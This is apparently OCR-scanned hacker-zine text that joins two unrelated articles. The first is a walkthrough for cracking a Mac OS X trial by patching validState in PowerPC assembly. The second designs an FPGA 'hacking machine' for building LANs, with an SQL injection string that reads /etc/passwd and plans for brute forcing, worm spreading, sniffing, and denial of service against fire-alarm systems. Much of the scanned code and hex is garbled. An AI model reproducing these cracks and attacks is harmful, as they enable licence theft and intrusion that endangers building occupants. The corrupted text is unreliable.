0x00051110 <-[StateController validState]+320>: mr 63,20 
Move r0 to r3 - the function result. 
0x00051114 <-[StateController validState]+324>: lwz r0,104 (r1) 
0x00051118 <-[StateController validState]+328>: addi r1,r1,96 
Ox00051l1l1lc <-[StateController validState]+332>: lwz r27,-20(r1) 
0x00051120 <-[StateController validState]+336>: mtlr r0 
0x00051124 <-[StateController validState]+340>: blr 
Various housekeeping and then return. For the most 
part, we reload those words we pushed into memory and 
the link register we stored in the opening moves. 


Ok, 
it’s name might i 
the program, 
a dialog box aski 


So it’s not w 


in summary, 


initializes some data structures, 


End of assembler dump. 


it seems validState does something different to what 
ndicate - it checks if it’s the first time you’ve run 
etc. If it returns one, 


ng you to join the company email list is displayed. 


hat we thought, but it’s not a waste of time - we’ve 


uncovered two useful pieces of information - the location of the date of 


first invocation 
current invocatio 
correctly anytime 


( StateController + 40 ) and the location of the date of 


These should all be set 
These 


n ( StateController + 44 ). 
after the first invocation of this function. 


two pieces of information are key to determining whether the software 
has expired or not. 


We have a couple of options here. 


this data, 
trial is over, 


we can 
or 


Knowing the offset information of 
attempt to find the code that checks to see if the 
we can attempt to intercept the initialization 


process and manipulate the data loading to ensure that the user is 
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always within the trial window. As this would be perfectly sufficient, 
we’ll try that - a discussion of other avenues might make for interesting 
homework or a future article. 


--[ 4.0 - Solutions and Patching 


A possible method will be to overwrite the contents of 


StateController + 40 with StateController + 44 ( setting the 
date the program was first run to the current date ) and then return 
zero, leaving alone the code that deals with the preferences api. Due to 


the object oriented methodology of Cocoa development, the chances of 
some other function going crazy and performing a jump into the other parts 
of the function are slim to nil, and so we can leave it as is. 


A Proposed replacement function: 


Obtain a register for us to use. Load the contents of StateController 
+44 into it, write that register to StateController +40, release th 
register, zero r3, return. The write is done like this as you cannot 
write directly to memory from memory in PPC assembler. 


stw r3l1, -20(r1) 
lwz rol, 44 (r3) 

stw ESA, 40 (r3) 

lwz r31, -20(r1) 
xor 63; 3, 3 
blr 


Instead of consulting with the instruction reference to assemble it by 
hand, I’m going to be cheap and use GCC. Paste the code into a file as 
follows: 


newfunc.s: 


text 
-globl _main 

main 
stw r3l1, -20(r1) 
lwz R34; 44 (r3) 
stw RS, 40 (r3) 
lwz r3l1, -20(r1) 
xor 63; 63; r3 
blr 


Compile it as follows: ‘gcc newfunc.s -o temp‘, and load it into gdb: 


(gdb) x/15i main 

Oxldec <main>: stw r31,-20(r1) 

Oxldf0 <maint+4>: lwz r31,44 (x3) 
Oxldf4 <maints8>: stw r31,40 (x3) 
Oxldf8 <maintl12>: lwz r31,-20(r1) 
Oxldfc <main+l16>: xor 63;L3,.43 
Oxle0O <maint+20>: blr 

Oxle04 <dyld_stub_exit>: mflr r0 


We want to see the machine code for 24 instructions post <main>. 


(gdb) x/24xb main 
Oxldec <main>: 


0x93 Oxel Oxtt Oxec 0x83 Oxe3 0x00 Ox2c 
Oxldf4 <main+s8>: 

0x93 Oxe3 0x00 0x28 0x83 Oxel Oxff Oxec 
Oxldfc <main+l6>: 


Ox7c 0x63 Oxla 0x78 Ox4e 0x80 0x00 0x20 
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Now that we have our assembled bytecode, we need to paste it into 
our executable. GDB is ( in theory ) capable of patching the file 
directly, but it’s a bit more complicated than it might appear ( 
see Appendix B for details ). 

The good news is, finding the correct offset for patching the file 
itself is not difficult. First, note the offset of the code you wish 
to replace, as it appears in GDB. ( In this case, that’s O0x50fd0. ) Now, 
do the following: 


| (gdb) info sym 0x50fd0 
| [StateController validState] in section LC_SEGMENT.__TEXT.__text 
| of <executable name> 


Armed with this knowledge of what segment the code falls in 
( _ TEXT.__text ), we can proceed. Run "otool -1" on your binary, 


and search for something like this ( taken from a different executable, 
unfortunately ): 
Section 
sectname __text 
segname __ TEXT 


addr 0x0000236c 
size 0x000009a8 
offset 4972 
align 2%2 (4) 
reloff 0 
nreloc 0 
flags 0x80000400 
reservedl 0 
reserved2 0 


The offset to your code in the file is equal to the address of the 
code in memory, minus the "addr" entry, plus the "offset" entry. Keep 
in mind that "addr" is in hex and offset is not! Now you can just 
over-write the code as appropriate in your hex editor. 


Save and then try and run the program. It worked for me first time! 
--[{ A - GDB, OSX, PPC & Cocoa - Some Observations. 


Calling Convention: 

When handling calls, registers 0, 1 and 2 store important housekeeping 
information. They are not to be fucked with unless you carefully restore 
their values post haste. Arguments to functions commence at r3, and 
return values are stored at r3 as well. Except for stuff like floats, 
which you might find coming back in fl, etc. 


One of the things that makes OSX applications such a joy to crack is 
the heavy reliance on neatly defined object oriented interfaces, and the 
corresponding heavy use of messaging. Often in disassemblies you will 
come across branches to <dyld_stub_objc_msgSend>. This is a reformulation 
of the typical calling convention: 


| [ anObject aMessage: anArgument andA: notherArgument J; 
Into something like this: 
| objc_msgSend( anObject, "“aMessage:andA:", anArgument, notherArgument ); 


Hence, the receiving object will occupy r3, the selector will be a 
plain string at r4, and subsequent arguments will occupy r5 onwards. As 
r4 will contain a string, interrogate it with "x/s $r4", as the receiver 
will be an object, "po $r3", and for the types of subsequent arguments, I 
recommend you consult the xcode documentation where available. "po" is 
shorthand for invoking the description methods on the receiving object. 
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GDB Integration: 

Due to the excellent Objective C support in GDB, not only can we 
breakpoint functions using their [] message nomenclature, but also 
perform direct invocations of methods as such: if r5 contained a pointer 
to an NSString object, the following is quite reasonable: 


| (gdb) print ( char * ) [ $r5 cString ] 
| $3 = 0x833c8 " \t\r\n" 


Very useful. Don’t forget that it’s available if you want to test 
how certain functions react to certain inputs. 


-- [ B - Why can’t we just patch with GDB? 


As some of you probably know, GDB can, in principle, write changes 
out to core and executable files. This is not really practical in 
the scenario we’re dealing with here, and I’11 explain why. 


First, Mach-O binaries have memory protection. If you’re going to 
overwrite parts of the __TEXT.__text segment, you’re going to have 
to reset it’s permissions. Christian Klein has written a program to 
do this ( see <http://blogs.23.nu/cOre/stories/7873/>. ) You can 
also, once the program is running and has an execution space, do 
things like: 


| (gdb) print (int)mprotect( <address>, <length>, 0x1|/0x2|0x4 ) 


However, even when this is done, this only lets you write to the 
process in memory. To actually make changes to the disk copy, you 
need to either invoke GDB as ’gdb --write’, or execute: 


| (gdb) set write on 
| (gdb) exec-file <filename> 


The problem is, OSX uses demand paging for executables. 


What this means is that the entire program isn’t loaded into memory 
straight away - it’s lifted off disk as needed. As a result, you’re 
not allowed to execute a file which is open for writing. 


The upshot is, if you try and do it, as soon as you run the program 
in the debugger, it crashes out with "Text file is busy". 
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--[ 1. - Introduction 


Embedded systems have been penetrated the daily human life. In 
residential home, the deployment of "smart" systems have brought out the 
term of "smart-home". It is dealing with the home security, electronic 
appliances control and monitoring, audio/video based entertainment, home 
networking, and etc. In building automation, embedded system provides the 
ability of network enabled (Lonwork, Bacnet or X10) for extra convenient 
control and monitoring purposes. For intra-building communication, the 
physical network media including power-line, RS485, optical fiber, RJ45, 
IrDA, RF, and etc. In this case, media gateway is playing the roll to 
provide inter-media interfacing for the system. For personal handheld 
systems, mobile devices such as handphone/smartphone and PDA/XDA are going 
to be the necessity in human life. However, the growing of 3G is not as 
good as what is planning initially. The slow adoption in 3G is because it 
is lacking of direct compatibility to TCP/IP. As a result, 4G with Wimax 
technology is more likely to look forward by communication industry 
regarding to its wireless broadband with OFDM. 


Obviously, the development trend of embedded systems application is 
going to be convergenc by applying TCP/IP as "protocol glue" for 
inter-media interfacing purpose. Since the deployment of IPv6 will cause 
an unreasonable overshooting cost, so the widespread of IPv6 products 
still needs some extra times to be negotiated. 

As a result, IPv4 will continue to dominate the world of networking, 
especially in embedded applications. As what we know, the brand-old 
IPv4 is being challenged by its native security problems in terms of 
confidentiality, integrity, and authentication. 

Extra value added modules such as SSL and SSH would be the best solution 
to protect most of the attacks such as Denial of Service, hijacking, 
spooling, sniffing, and etc. However, the implementation of such value 
added module in embedded system is optional because it is lacking of 
available hardware resources. For example, it is not reasonable to 
implement SSL in SitePlayer[1] for a complicated web-based control and 
monitoring system by considering the available flash and memory that 
can be utilized. 


By the time of IPv4 is going to conquer th mbedded system’s world, 
the native characteristic of IPv4 and the reduced structure of embedded 
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system would be problems in security consideration. 

These would probably a hidden timer-bomb that is waiting to be exploited. 
As an example, by simply performing port scan with pattern recognition to 
a range of IP address, any of the running SC12 IPC@CHIP[2] can be 
identified and exposed. Once the IP address of a running SC12 is confirmed, 
by applying a sequence of five ping packet with the length of 65500 is 
sufficient to crash it until reset. 


--[ 2. - Architectures Classification 


With the advent of commodity electronics in the 1980s, digital utility 
began to proliferate beyond the world of technology and industry. By its 
nature digital signal can be represented exactly and easily, which gives 
it much more utility. In term of digital system design, programmable 
logic has a primary advantage over custom gate arrays and standard cells 
by enabling faster time-to-complete and shorter design cycles. By using 
software, digital design can be programmed directly into programmable 
logic and allowing making revisions to the design relatively quickly. 

The two major types of programmable logic devices are Field Programmable 
Logic Arrays (FPGAs) and Complex Programmable Logic Devices (CPLDs). 
FPGAs offer the highest amount of logic density, the most features, 

and the highest performance. These advanced devices also offer features 
such as built-in hardwired processors (such as the IBM Power PC), 
substantial amounts of memory, clock management systems, and support 

for many of the latest very fast device-to-device signaling technologies. 
FPGAs are used in a wide variety of applications ranging from data 
processing and storage, instrumentation, telecommunications, and digital 
signal processing. Instead, CPLDs offer much smaller amounts of logic 
(approximately 10,000 gates). But CPLDs offer very predictable timing 
characteristics and are therefore ideal for critical control applications. 
Besides, CPLDs also requir xtremely low amounts of power and are very 
inexpensive. 


Well, it is the time to discuss about Hardware Description Language 
(HDL). HDL is a software programming language used to model the intended 
operation of a piece of hardware. There are two aspects to the description 
of hardware that an HDL facilitates: true abstract behavior modeling and 
hardware structure modeling. The behavior of hardware may be modeled and 
represented at various levels of abstraction during the design process. 
Higher level models describe the operation of hardware abstractly, while 
lower level models include more detail, such as inferred hardware 
structure. There are two types of HDL: VHDL and Verilog-HDL. The history 
of VHDL started from 1980 when the USA Department of Defence (DoD) wanted 
to make circuit design self documenting, follow a common design methodology 
and be reusable with new technologies. It became clear there was a need for 
a standard programming language for describing the function and structure 
of digital circuits for the design of integrated circuits (ICs). The DoD 
funded a project under the Very High Speed Integrated Circuit (VHSIC) 
program to create a standard hardware description language. 

The result was the creation of the VHSIC hardware description language or 
VHDL as it is now commonly known. The history of Verilog-HDL started from 
1981, when a CAE software company called Gateway Design Automation that was 
founded by Prabhu Goel. One of the Gateway’s first employees was Phil 
Moorby, who was an original author of GenRad’s Hardware Description 
Language (GHDL) and HILO simulator. On 1983, Gateway released the Verilog 
Hardware Description Language known as Verilog-HDL or simply Verilog 
together with a Verilog simulator. Both VHDL and Verilog-HDL are reviewed 
and adopted by IEEE as IEEE standard 1076 and 1364, respectively. 


Modern hardware implementation of embedded systems can be classified 
into two categories: hardcore processing and softcore processing. Hardcore 
processing is a method of applying hard processor(s) such as ARM, MIPS, 
x86, and etc as processing unit with integrated protocol stack. 

For example, SC12 with x86, IP2022 with Scenix RISC, eZ80, SitePlayer 
and Rabbit are dropped in the category of hardcore processing.Instead, 
softcore processing is applying a synthesizable core that can be targeted 
into different semiconductor fabrics. The semiconductor fabrics should be 
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programmable as what FPGA and CPLD do. Altera[3] and Xilinx[4] are the 
only FPGA/CPLD manufacturers in the market that supporting softcore 
processor. Altera provides NIOS processor that can be implemented in SOPC 
Builder that is targeted to its Cyclone and Stratix FPGAs. Xilinx provides 
two types of softcore: Picoblaze, that is targeted to its CoolRunner-2 
CPLD; and Microblaze, that is targeted to its Spartan and Virtex FPGAs. 
For the case of FPGAs with embedded hardcore, for example ARM-core in 
Stratix, and MIPS-core in Virtex are classified as embedded hardcore 
processing. On the other hand, FPGAs with embedded softcore such as 
NIOS-core in Cyclone or Stratix, and Microblaze-core in Spartan or Virtex 
are classified as softcore processing. Besides, th mbedded softcore can 
be associated with others synthesizable peripherals such as DMA controller 
for advanced processing purpose. 


In general, the classical point of view regarding to the hardcore 
processing might assuming it is always running faster than softcore 
processing. However, it is not the fact. Processor performance is often 
limited by how fast the instruction and data can be pipelined from external 
memory into execution unit. As a result, hardcore processing is more 
suitable for general application purpose but softcore processing is more 
liable to be used in customized application purpose with parallel 
processing and DSP. It is targeted to flexible implementation in adaptive 
platform. 


--[ 3. - Hacking with Embedded System 


When the advantages of softcore processing are applied in hacking, it 
brings out more creative methods of attack, the only limitation is the 
imagination. Richard Clayton had shown the method of extracting a 3DES key 
from an IBM 4758 that is running Common Cryptographic Architecture 
(CCA) [5]. The IBM 4758 with its CCA software is widely used in the banking 
industry to hold encryption keys securely. The device is extremely 
tamper-resistant and no physical attack is known that will allow keys to be 
accessed. According to Richard, about 20 minutes of uninterrupted access to 
t 
D 


he IBM 4758 with Combine_Key_Parts permission is sufficient to export the 
ES and 3DES keys. For convenience purpose, it is more likely to implement 
an embedded system with customized application to get the keys within the 
20 minutes of accessing to the device. An evaluation board from Altera was 
selected by Richard Clayton for the purpose of keys exporting and 
additional two days of offline key cracking. 


In practice, by using multiple NIOS-core with customized peripherals 
would provide better performance in offline key cracking. In fact, 
customized parallel processing is very suitable to exploit both symmetrical 
and asymmetrical encrypted keys. 


--[ 4. - Hacking with Embedded Linux 


For application based hacking, such as buffer overflow and SQL 
injection, it is more preferred to have RTOS installed in the embedded 
system. For code reusability purpose, embedded linux would be the best 
choice of embedded hacking platform. The following examples have clearly 
shown the possible attacks under an embedded platform. The condition of 
the embedded platform is come with a Nios-core in Stratix and uClinux 
being installed. By recompiling the source code of netcat and make it run 
in uClinux, a swiss army knife is created and ready to perform penetration 
as listed below: - 


a) Port Scan With Pattern Recognition 


A list of subnet can be defined initially in the embedded system 
and bring it into a commercial building. Plug the embedded system 
into any RJ45 socket in the building, press a button to perform port 
scan with pattern recognition and identify any vulnerable network 
embedded system in the building. Press another button to launch attack 
(Denial of Service) to the target network embedded system(s). This 
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is a serious problem when the target network embedded system(s) is/are 
related to the building evacuation system, surveillance system or 
security system. 


b) Automatic Brute-Force Attack 


Defines server(s) address, dictionary, and brute-force pattern 
in the embedded system. Again, plug the embedded system into any RJ45 
socket in the building, press a button to start the password guessing 
process. While this small box of embedded system is located in a hidden 
corner of any RJ45 socket, it can perform the task of cracking over 
days, powered by battery. 


c) LAN Hacking 


By pre-identify the server(s) address, version of patch, type 
of service(s), a structured attack can be launched within the area 
of the building. For example, by defining: 


http://192.168.1.1/show. php?id=1%20and%201=2%20union%20select%20 
8,7, load_file (char (47,101,116,99,47,112,97,115,115,119,100)),5,4, 
35291 


**char (47,101,116, 99,47,112,97,115,115,119,100) = /etc/passwd 


in the embedded system initially. Again, plug the embedded system into 
any RJ45 socket in the building (within the LAN), press a button to 
start SQL injection attack to grab the password file of the Unix 
machine (in the LAN). The password file is then store in the flash 
memory and ready to be loaded out for offline cracking. Instead of 
performing SQL injection, exploits can be used for the same 

purpose. 


d) Virus/Worm Spreading 


The virus/worm can be pre-loaded in the embedded system. Again, 
plug the embedded system into any RJ45 socket in the building, press a 
button to run an exploit to any vulnerable target machine, and load the 
virus/worm into the LAN. 


e) Embedded Sniffer 


Switch the network interface from normal mode into promiscuous mode 
and define the sniffing conditions. Again, plug the embedded system 
into any RJ45 socket in the building, press a button to start the 
sniffer. To make sure the sniffing process can be proceed in switch 
LAN, ARP sniffer is recommended for this purpose. 


--[{ 5. - "Hacking Machine" Implementation In FPGA 
The implementation of embedded "hacking machine" will be demonstrated 
in Altera’s NIOS development board with Stratix EP1S10 FPGA. The board 
provides a 10/100-base-T ethernet and a compact-flash connector. Two 
RS-232 ports are also provided for serial interfacing and system 
configuration purposes, respectively. Besides, the onboard 1MB of SRAM, 
16MB of SDRAM, and 8MB of flash memory are ready for embedded linux 
installation[6]. The version of embedded linux that is going to be applied 
is uClinux from microtronix[7]. 


Ok, that is the specification of the board. Now, we start our journey 
of "hacking machine" design. We use three tools provided by Altera to 
implement our "hardware" design. In this case, the term of "hardware" means 
it is synthesizable and to be designed in Verilog-HDL. The three tools 
being used are: QuartusII ( as synthesis tool), SOPC Builder (as 
Nios-core design tool), and C compiler. Others synthesis tools such as 
leonardo-spectrum from mentor graphic, and synplify from synplicity are 
optional to be used for special purpose. In this case, the synthesized 
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design in edif format is defined as external module. It is needed to import 
the module from QuartusII to perform place-and-route (PAR). The outcome of 
PAR is defined as hardware-core. For advanced user, Modelsim from mentor 
graphic is highly recommended to perform behavioral simulation and Post-—PAR 
simulation. Behavioral simulation is a type of functional verification to 
the digital hardware design. Timing issues are not put into the 
consideration in this state. Instead, Post-PAR simulation is a type of 
real-case verification. In this state, all the real-case factors such as 
power-consumption and timing conditions (in sdf format) are put into the 
consideration. [8,9,10,11,12] 


A reference design is provided by microtronix and it is highly 
recommended to be the design framework for any others custom design with 
appropriate modifications [13]. Well, for our "hacking machine" design 
purpose, the only modification that we need to do is to assign the 
interrupts of four onboard push-buttons [14]. So, once the design 
framework is loaded into QuartusII, SOPC Builder is ready to start 
the design of Nios-core, Boot-ROM, SRAM and SDRAM inteface, Ethernet 
interface, compact-flash interface and so on. Before starting to generate 
synthesizable codes from the design, it is crucial to ensure the check-box 
fe) 
t 
B 
k 


f "Microtronix uClinux" under Software Components is selected (it is in 

he "More CPU Settings" tab of the main configuration windows in SOPC 
uilder). By selecting this option, it is enabling to build a uClinux 
ernel, uClibc library, and some uClinux’s general purpose applications by 
the time of generating synthesizable codes. Once ready, generate the design 
as synthesizable codes in SOPC Builder following by performing PAR in 
QuartusII to get a hardware core. In general, there are two formats of 
hardware core:- 


a) .sof core: To be downloaded into the EP1S10 directly by JTAG and 
will require a re-load if the board is power cycled 
** (Think as volatile) 


b) .pof core: To be downloaded into EPC16 (enhanced configuration 
device) and will automatically be loaded into the 
FPGA every time the board is power cycled 
** (Think as non-volatile) 


The raw format of .sof and .pof hardware core is .hexout. As hacker, 
we would prefer to work in command line, so we use the hexout2flash tool 
to convert the hardware core from .hexout into .flash and relocate the 
base address of the core to 0x600000 in flash. The 0x600000 is the startup 
core loading address of EP1S10. So, once the .flash file is created, we 
use nios-run or nr command to download the hardware core into flash memory 
as following: 


[Linux Developer] ...uClinux/: nios-run hackcore.hexout.flash 


After nios-run indicates that the download has completed successfully, 
restart the board. The downloaded core will now start as the default core 
whenever the board is restarted. 


Fine, the "hardware" part is completed. Now, we look into the 
"software" implementation. We start from uClinux. As what is stated, the 
SOPC Builder had generated a framework of uClinux kernel, uClibc library, 
and some uClinux general purpose applications such as cat, mv, rm, and etc. 


We start to reconfigure the kernel by using "make xconfig". 


= 


Linux Developer] ...uClinux/: cd linux 
Linux Developer] ...uClinux/: make xconfig 


= 


In xconfig, perform appropriate tuning to the kernel, then us 
"make clean" to clean the source tree of any object files. 


[Linux Developer] ...linux/: make clean 


To start building a new kernel use "make dep" following by "make". 
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= 


Linux Developer] ...linux/: make dep 
Linux Developer] ...linux/: make 


= 


To build the linux.flash file for uploading, use "make linux.flash". 


[Linux Developer] ...uClinux/: make linux.flash 


The linux.flash file is defined as the operating system image. 

As what we know, an operating system must run with a file system. 

So, we need to create a file system image too. First, edit the config 
file in userland/.config to select which application packages get 
built. For example: 


#TITLE agetty 
CONF IG_AGETTY=y 


If an application package’s corresponding variable is set to ‘n’ 
(for example, CONFIG_AGETTY=n), then it will not be built and copied 
over to the target/ directory. Then, build all application packages 
specified in the userland/.config as following: 


[Linux Developer] ...userland/: make 


Now, we copy the pre-compiled netcat into target/ directory. 
After that, use "make romfs" to start generating the file system or 
romdisk image. 


[Linux Developer] ...uClinux/: make romfs 


Once completed, the resulting romdisk.flash file is ready to be 
downloaded 

to the target board. First, download the file system image following by 
the operating system image into the flash memory. 


= 


Linux Developer] ...uClinux/: nios-run -x romdisk.flash 
Linux Developer] ...uClinux/: nios-run linux.flash 


= 


Well, our FPGA-based "hacking machine" is ready now. 


Lets try to make use of it to a linux machine with /etc/passwd 
enabled. We assume the ip of the target linux machine is 192.168.1.1 
as web server in the LAN that utilize MySQL database. Besides, we know 
that its show.php is vulnerable to be SQL injected. We also assume it has 
some security protections to filter out some dangerous symbols, so we 
decided to use char() method of injection. We assume the total columns in 
the table that access by show.php is 8. 


Now, we define: 


char getpass[]="http://192.168.1.1/show.php?id=1%20and%201=2%20union 
S20select%208,7, load_file (char (47,101,116, 99,47,112,97,115,115,119, 
100)),5,4,3,2,1"; 


as attacking string, and we store the respond data (content of 
/etc/passwd) in a file name of password.dat. By creating a pipe to the 
netcat, and at the same time to make sure the attacking string is always 
triggered by the push-button, well, our "hacking machine" is ready. 


Plug the "hacking machine" into any of the RJ45 socket in the LAN, 
following by pressing a button to trigger the attacking string against 
192.168.1.1. After that, unplug the "hacking machine" and connect to a 
pc, download the password.dat from the "hacking machine", and start the 
cracking process. By utilizing the advantages of FPGA architecture, 

a hardware cracker can be appended for embedded based cracking process. 
Any optional module can be designed in Verilog-HDL and attach to the 

FPGA for all-in-one hacking purpose. The advantages of FPGA implementation 
over the conventional hardcore processors will be deepened in the 
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following section, with a lot of case-studies, comparisons and 
wonderful examples. 


Tips: 


**FTP server is recommended to be installed in "hacking machine" 
because of two reasons: 


1) Any new or value-added updates (trojans, exploits, worms,...) to 
the "hacking machine" can be done through FTP (online update). 


2) The grabbed information (password files, configuration files,...) 
can be retrieved easily. 


Notes: 


*xInstallation of FTP server in uClinux is done by editing 
userland/.config file to enable the ftpd service. 


**This is just a demostration, it is nearly impossible to get a 
unix/linux machine that do not utilize file-permission and shadow 
to protect the password file. This article is purposely to show 
the migration of hacking methodology from PC-based into embedded 
system based. 


--[ 6. - What The Advantages Of Using FPGA In Hacking ? 


Well, this is a good question while someone will ask by using a $50 
Rabbit module, a 9V battery and 20 lines of Dynamic C, a simple "hacking 
machine" can be implemented, instead of using a $300 FPGA development 
board and a proprietary embedded processor with another $495. The answer 
is, FPGA provides a very unique feature based on its architecture that is 
able to be hardware re-programmable. 


As what we know, FPGA is a well known platform for algorithm 
verification in hardware implementation, especially in DSP applications. 
The demand for higher bit rates by the wired and wireless communications 
industry has led to the development of higher bit rate and low cost serial 
link interface chips. Based on such considerations, some demands of 
programmable channel and band scanning are needed to be digitized and 
re-programmable. A new term has been created for this type of framework 
as "software defined radio" or SDR. However, the slow adoption of SDR is 
due to the limitation in Analog-to-Digital Converter (ADC) to digitize 
the analog demodulation unit in transceiver module. 

Although the sampling rate of the most advanced ADC is not yet to meet 

the specification of SDR, but it will come true soon. In this case, the 
application of conventional DSP chips such as TMS320C6200 (for 

fixed-point processing) and TMS320C6700 (for floating-point processing) 

are a little bit harder to handle such extremely high bit rates. Of 

course, someone may claim its parallel processing technique could solve 
the problem by using the following symbols in linear assembly language[15]. 


Instl 

| Inst2 

| Inst3 

| Inst4 

| Inst5 

| Inst6 
Inst7 


[The double-pipe symbols (||) indicate instructions that are in parallel 
with a previous instruction. Inst2 to Inst6, these five instructions run 

in parallel with the first instruction, Instl. In TMS320, up to eight 
instructions can be running in parallel. However, this is not a true 
parallel method, but perform pipelining in different time-slot within a 
single clock cycle. 

Instead, the true parallel processing can only be implemented with 
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different sets of hardware module. So, FPGA should be the only solution to 
implement a true parallel processing architecture. For the case of SDR that 
is mentioned, it is just a an example to show the limitation of data 
processing in the structure of resource sharing. Meanwhile, when we 
consider to implement an encryption module, it is the same case as what 
data processing do. The method of parallel processing is extremely worth to 
nhance the time of key cracking process. Besides, it is significant to 
know that the implementation of encryption module in FPGA is 
hardware-driven. It is totally free from the limitation of any hardcore 
processor structure that is using a single instruction pointer (or program 
counter) to performing push and pop operations interactively over the stack 
memory. So, both of the mentioned advantages: true-parallel processing, and 
hardware-driven, are nicely clarified the uniqueness of FPGA’s architecture 
for advanced applications. 


While we go further with the uniqueness of FPGA’s architecture, 
more and more interesting issues can come into the discussion. 
For hacking purpose, we focus and stick to the discussion of utilizing 
the ability of hardware re-programmable in a FPGA-based "hacking machine". 
We ignore the ability of "software re-programmable" here because it can be 
done by any of the hardcore processor in the lowest cost. By applying the 
characterictic of hardware re-programmable, a segment of space in flash 
memory is reserved for hardware image. In Nios, it is started from 
0x600000. This segment is available to be updated from remote through the 
network interface. In advanced mobile communication, this type of feature 
is started to be used for hardware bug-fix as well as module update [16] 
purpose. It is usually known as Over-The-Air (OTA) technology. For hacking 
purpose, the characteristic of hardware re-programmable had made our 
"hacking machine" to be general purpose. It can come with a hardware-driven 
DES cracker, and easily be changed to MD5 cracker or any other types of 
hardware-driven module. Besides, it can also be changed from an online 
cracker to be a proxy, in a second of time. 


In this state, the uniqueness of FPGA’s architecture is clear now. 
So, it is the time to start the discussion of black magic with the 


characteristic of hardware re-programmable in further detail. By using 
Nios-core, w xplore from two points: custom instruction and user 
peripheral. A custom instruction is hardware-driven and implemented by 


custom logic as shown below: 
>| | 
|Custom Logic|-—| 
L==2:) | | 
| | 
It as | | 
ated l= 
| Nios-ALU | |----> OUT 
Bee S | \-| 


By defining a custom logic that is parallel connected with Nios-ALU inputs, 
a new custom instruction is successfully created. With SOPC Builder, custom 
logic can be easily add-on and take-out from Nios-ALU, and so is the case 
of custom instruction. Now, we create a new custom instruction, let say 
nm_fpmult(). We apply the following codes: 


float a, b, result_slow, result_fast; 


result_slow 
result_fast 


a * b; //Takes 2874 clock cycles 
nm_fpmult(a, b); //Takes 19 clock cycles 


From the running result, the operation of hardware-based multiplication 

as custom instruction is so fast that is even faster than a DSP chip. 

For cracking purpose, custom instructions set can be build up in respective 
to the frequency of operations being used. The instructions set is easily 
to be plugged and unplugged for different types of encryption being 
adopted. 
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The user peripheral is the second black magic of hardware 
re-programmable. As we know Nios-core is a soft processor, so a bus 
specification is needed for the communication of soft processor with other 
peripherals, such as RAM, ROM, UART, and timer. Nios-core is using a 
proprietary bus specification, known as Avalon-bus for 
peripheral-to-peripheral and Nios-core-to-peripheral communication purpose. 
So, user peripherals such as IDE and USB modules are usually be designed to 
expand the usability of embedded system. For hacking purpose, we ignore the 
IDE and USB peripherals because we are more interested to design user 
peripheral for custom communication channel synchronization. When we 
consider to hack a customize system such as building automation, public 
addressing, evacuation, security, and so on, the main obstacle is its 


proprietary communication protocol [17, 18, 19, 20, 21, 22]. 


In such case, a typical network interface is almost impossible to 
synchronize into the communication channel of a customize system. 
For example, a system that is running at 50Mbps, neither a 10Based-T 
nor 100Based-T network interface card can communicate with any module 
within the system. However, by knowing the technical specification of such 
system, a custom communication peripheral can be created in FPGA. So, it is 
able to synchronize our "hacking machine" into the communication channel of 
the customize system. By going through the Avalon-bus, Nios-core is 
available to manipulate the data-flow of the customize system. So, the 
custom communication peripheral is going to be the customize media gateway 
of our "hacking machine". The theoretical basis of custom communication 
peripheral is come from the mechanism of clock data recovery (CDR). CDR is 
a method to ensure the data regeneration is done with a decision circuit 
that samples the data signal at the optimal instant indicated by a clock. 
The clock must be synchronized as exactly the same frequency as the data 
rate, and be aligned in phase with respect to the data. The production of 
such a clock at the receiver is the goal of CDR. In general, the task of 
CDR is divided into two: frequency acquisition and timing alignment. 

Frequency acquisition is the process that locks the receiver clock 
frequency to the transmitted data frequency. Timing alignment is the phase 
alignment of the clock so the decision circuit samples the data at the 
optimal instant. Sometime, it is also named as bit synchronization or phase 
locking. Most timing alignment circuits can perform a limited degree of 
frequency acquisition, but additional acquisition aids may be needed. Data 
oversampling method is being used to create the CDR for our "hacking 
machine". By using the method of data oversampling, frequency acquisition 
is no longer be put into the design consideration. By ensuring the sampling 
frequency is always N times over than data rate, the CDR is able to work as 
normal. To synchronize multiple of customize systems, a frequency synthesis 
unit such as PLL is recommended to be used to make sure the sampling 
frequency is always N times over than data rate. A framework of CDR 
based-on the data oversampling method with N=4 is shown as following in 
Verilog-HDL. 


*xThe sampling frequency is 48MHz (mclk), which is 4 times of 
data rate (12MHz). 


//define input and output 
input data_in; 

input mclk; 

input rst; 

output data_buf; 
//asynchronous edge detector 


A 


wire reset = (rst & ~(data_in capture_buf)); 
//data oversampling module 


reg capture_buf; 


always @ (posedge mclk or negedge rst) 
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if (rst == 0) 
capture_buf <= 0; 
else 
capture_buf <= data_in; 


//edge detection module 
reg [1:0] mclk_divd; 


always @ (posedge mclk or negedge reset or posedge reset) 
if (reset == 0) 
mclk_divd <= 2’b00; 
else 
mclk_divd <= mclk_divd + 1; 


//capture at data eye and put into a 16-bit buffer 
reg [15:0] data_buf; 


always @ (posedge mclk_divd[1] or negedge rst) 
if (rst == 0) 
data_buf <= 0; 
else 
data_buf <= {data_buf[14:0],capture_buf}; 


Once the channel is synchronized, the data can be transferred to 
Nios-core through the Avalon-Bus for further processing and interaction. 
The framework of CDR is plenty worth for channel synchronization in various 
types of custom communication channels. Jean P. Nicolle had shown another 
type of CDR for 10Base-T bit synchronization [23]. As someone might query 
for the most common approach of performing CDR channel synchronization in 
Phase-Locked Loop (PLL). Yes, this is a type of well known analog approach, 
by we are more interested to the digital approach, with the reason of 
hardware re-programmable - our black magic of FPGA. For those who 
interested to know more advantages of digital CDR approach over the analog 
CDR approach can refer to [24]. Anyway, the analog CDR approach is the only 
option for a hardcore-based (Scenix, Rabbit, SC12 ,...) "hacking machine" 
design, and it is sufferred to: 


1. Longer design time for different data rate of the communication link. 
The PLL lock-time to preamble length, charge-pump circuit design, 
Voltage Controlled Oscillator (VCO), are very critical points. 


2. Fixed-structure design. Any changes of "hacking application" need 
to re-design the circuit itself, and it is quite cumbersome. 


As a result, by getting a detail technical specification of a 

customized system, the possibility to hack into the system has always 
xisted, especially to launch the Denial of Service attack. By disabling 

an evacuation system, or a fire alarm system at emergency, it is a very 
serious problem than ever. Try to imagine, when different types of CDRs 

are implemented in a single FPGA, and it is able to perform automatic 
switching to select a right CDR for channel synchronization. On the other 
hand, any custom defined module is able to plug into the system itself 

and freely communicate through Avalon-bus. Besides, the generated hardware 
image is able to be downloaded into flash memory through tftp. By following 
with a soft-reset to re-configure the FPGA, the "hacking machine" is 
successfully updated. So, it is ready to hack multiple of custom systems at 
the same time. 


case study: 


**The development of OPC technology is slowly become popular. 
